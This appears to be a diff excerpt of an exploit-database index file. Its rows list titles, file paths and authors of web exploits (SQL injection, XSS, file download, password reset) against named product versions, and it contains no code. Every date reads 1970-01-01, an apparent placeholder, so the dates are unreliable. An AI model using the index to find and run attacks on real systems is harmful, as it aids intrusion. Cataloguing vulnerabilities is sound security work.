35237,exploits/multiple/webapps/35237.txt,"Gogs - 'label' SQL Injection",1970-01-01,"Timo Schmid",webapps,multiple,80
35238,exploits/multiple/webapps/35238.txt,"Gogs - 'users'/'repos' '?q' SQL Injection",1970-01-01,"Timo Schmid",webapps,multiple,
35239,exploits/php/webapps/35239.txt,"phpCMS 2008 V2 - 'data.php' SQL Injection",1970-01-01,R3d-D3V!L,webapps,php,
35245,exploits/php/webapps/35245.txt,"PHPAuctions - 'viewfaqs.php' SQL Injection",1970-01-01,"BorN To K!LL",webapps,php,
35245,exploits/php/webapps/35245.txt,"PHPAuctions - 'viewfaqs.php' SQL Injection",1970-01-01,h4ck3r,webapps,php,
35246,exploits/php/webapps/35246.py,"Joomla! Component com_hdflvplayer < 2.1.0.1 - Arbitrary File Download",1970-01-01,"Claudio Viviani",webapps,php,
35248,exploits/multiple/webapps/35248.txt,"clientResponse Client Management 4.1 - Cross-Site Scripting",1970-01-01,"Halil Dalabasmaz",webapps,multiple,
35293,exploits/php/webapps/35293.txt,"Joomla! Component com_virtuemart 1.1.6 - SQL Injection",1970-01-01,"Andrea Fabrizi",webapps,php,
@ -44376,3 +44377,5 @@ id,file,description,date,author,type,platform,port
50427,exploits/php/webapps/50427.txt,"WordPress Theme Enfold 4.8.3 - Reflected Cross-Site Scripting (XSS)",1970-01-01,"David Álvarez Robles",webapps,php,
50428,exploits/multiple/webapps/50428.txt,"myfactory FMS 7.1-911 - 'Multiple' Reflected Cross-Site Scripting (XSS)",1970-01-01,"RedTeam Pentesting GmbH",webapps,multiple,
50429,exploits/php/webapps/50429.py,"Online Motorcycle (Bike) Rental System 1.0 - Blind Time-Based SQL Injection (Unauthenticated)",1970-01-01,"Chase Comardelle",webapps,php,
50430,exploits/hardware/webapps/50430.txt,"SonicWall SMA 10.2.1.0-17sv - Password Reset",1970-01-01,"Jacob Baines",webapps,hardware,
50432,exploits/php/webapps/50432.txt,"Dolibarr ERP-CRM 14.0.2 - Stored Cross-Site Scripting (XSS) / Privilege Escalation",1970-01-01,"Oscar Gil Gutierrez",webapps,php,

Can't render this file because it is too large.